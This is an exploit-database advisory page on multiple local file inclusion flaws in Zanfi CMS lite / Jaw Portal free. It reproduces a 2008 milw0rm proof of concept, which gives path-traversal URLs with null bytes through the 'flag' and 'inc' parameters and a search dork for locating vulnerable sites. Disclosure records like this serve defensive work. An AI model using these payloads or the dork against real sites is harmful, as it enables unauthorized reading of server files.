header-logo
Suggest Exploit
vendor:
Zanfi CMS lite / Jaw Portal free
by:
SirGod
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Zanfi CMS lite / Jaw Portal free
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Zanfi CMS lite / Jaw Portal free (index.php page) Multiple Local File Inclusion

Zanfi CMS lite / Jaw Portal free is vulnerable to multiple local file inclusion. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious file path in the 'flag' or 'inc' parameter. This can allow an attacker to read arbitrary files on the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.
Source

Exploit-DB raw data:

############################################################################################################
[+]Zanfi CMS lite / Jaw Portal free (index.php page) Multiple Local File Inclusion
[+]Discovered by SirGod
[+]MorTal TeaM
[+]Greetz E.M.I.N.EM,Ras,Puscas_marin,ToxicBlood,HrN,Kemrayz,007m
############################################################################################################
 
[+] Dork : Powered by: Zanfi Solutions

[+] Local File Inclusion

   PoC :

    http://[target]/[Path]index.php?flag=[Local File]%00

   Example :

    http://127.0.0.1/index.php?flag=../../../autoexec.bat%00


   PoC :
 
    http://[target]/[Path]/index.php?inc=[Local File]%00

   Example :

    http://127.0.0.1/index.php?inc=../../../autoexec.bat%00

############################################################################################################

# milw0rm.com [2008-09-10]